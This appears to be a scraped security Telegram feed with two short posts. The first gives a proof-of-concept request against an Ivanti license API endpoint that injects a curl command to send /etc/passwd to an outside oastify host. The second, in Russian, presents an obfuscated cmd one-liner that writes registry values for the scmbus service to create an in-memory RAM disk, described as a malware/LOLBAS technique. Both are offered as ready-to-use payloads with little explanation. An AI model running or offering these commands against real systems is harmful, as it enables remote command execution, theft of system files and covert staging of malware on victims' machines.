Ivanti Decrypt Stored SQL
POC
POC
https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
👍24🔥6😱5
Слишком нестандартный способ создания RAM-диска
Ставит значения в реестр, необходимые для эмуляции RAM-диска, запускает
В общем все malware/LOLBAS-техникс
Ставит значения в реестр, необходимые для эмуляции RAM-диска, запускает
scmbus, а там уже монтирует виртуальный диск в память.В общем все malware/LOLBAS-техникс
cmd /v/k"set A=A&(for /L %i in (1,1,9)do set A=!A!!A!)&set R=reg add HKLM\SYSTEM\CurrentControlSet\Services\scmbus /f /t 3 /v &!R!ForceReadCachedLabels /d C!A!B!A!1&(for %v in (EnableLabelCache CreateSimulatedRamdiskRootDevice RamdiskSizeInBytes)do !R!%v /d DAC5)&sc start scmbus"
🔥21😱9